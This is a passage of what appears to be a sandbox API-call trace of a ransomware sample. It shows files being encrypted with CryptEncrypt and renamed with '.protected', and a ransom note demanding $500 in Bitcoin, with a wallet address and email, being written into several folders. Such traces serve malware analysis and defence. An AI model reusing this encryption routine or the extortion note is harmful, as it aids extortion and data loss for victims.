dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0065.467] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck") returned 76 [0065.467] StrStrW (lpFirst="Help_MValidator.Lck", lpSrch=".txt") returned 0x0 [0065.467] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck") returned 76 [0065.467] StrStrW (lpFirst="Help_MValidator.Lck", lpSrch=".rar") returned 0x0 [0065.467] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck") returned 76 [0065.467] StrStrW (lpFirst="Help_MValidator.Lck", lpSrch=".zip") returned 0x0 [0065.467] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.482] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.482] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.482] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.482] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.482] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0065.482] CloseHandle (hObject=0x14c) returned 1 [0065.483] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.protected") returned 86 [0065.483] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck.protected" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck.protected")) returned 1 [0065.483] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0065.483] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="Windows") returned -1 [0065.483] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="Program Files") returned -1 [0065.483] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="Program Files (x86)") returned -1 [0065.483] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="$Recycle.bin") returned 1 [0065.483] lstrcmpiW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="System Volume Information") returned -1 [0065.483] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned 103 [0065.483] StrStrIW (lpFirst="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpSrch=".protected") returned 0x0 [0065.483] lstrcmpW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="RESTORE_FILES.txt") returned -1 [0065.483] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0065.483] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0065.483] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0065.483] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned 103 [0065.483] StrStrW (lpFirst="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpSrch=".txt") returned 0x0 [0065.483] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned 103 [0065.484] StrStrW (lpFirst="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpSrch=".rar") returned 0x0 [0065.484] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned 103 [0065.484] StrStrW (lpFirst="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpSrch=".zip") returned 0x0 [0065.484] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.485] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.485] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0065.485] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.485] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0065.502] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0065.502] CloseHandle (hObject=0x14c) returned 1 [0065.502] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected") returned 113 [0065.502] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.protected" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q.protected")) returned 1 [0065.503] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0065.503] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0065.503] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\RESTORE_FILES.txt") returned 74 [0065.503] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0065.503] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.503] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0065.504] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.504] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0065.504] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.504] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0065.504] CloseHandle (hObject=0xd8) returned 1 [0065.504] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0065.504] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0065.504] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\RESTORE_FILES.txt") returned 68 [0065.505] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0065.505] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.505] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0065.505] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.505] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0065.505] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.505] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0065.505] CloseHandle (hObject=0xd4) returned 1 [0065.506] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0065.506] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0065.506] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\RESTORE_FILES.txt") returned 64 [0065.506] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0065.507] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.507] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0065.507] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.507] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0065.507] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.507] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0065.507] CloseHandle (hObject=0xb4) returned 1 [0065.507] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0065.508] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0065.508] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\RESTORE_FILES.txt") returned 57 [0065.508] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0065.508] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.508] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0065.508] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.508] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0065.509] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.509] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0065.509] CloseHandle (hObject=0xa4) returned 1 [0065.509] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0065.509] lstrcmpiW (lpString1="Crypto", lpString2="Windows") returned -1 [0065.509] lstrcmpiW (lpString1="Crypto", lpString2="Program Files") returned -1 [0065.509] lstrcmpiW (lpString1="Crypto", lpString2="Program Files (x86)") returned -1 [0065.509] lstrcmpiW (lpString1="Crypto", lpString2="$Recycle.bin") returned 1 [0065.509] lstrcmpiW (lpString1="Crypto", lpString2="System Volume Information") returned -1 [0065.509] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto") returned 35 [0065.509] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0065.509] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1 [0065.509] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*") returned 37 [0065.509] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0065.509] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.509] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.509] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.510] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.510] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.510] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\.") returned 37 [0065.511] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.511] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.511] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.511] lstrcmpiW (lpString1="..", lpString2="Program 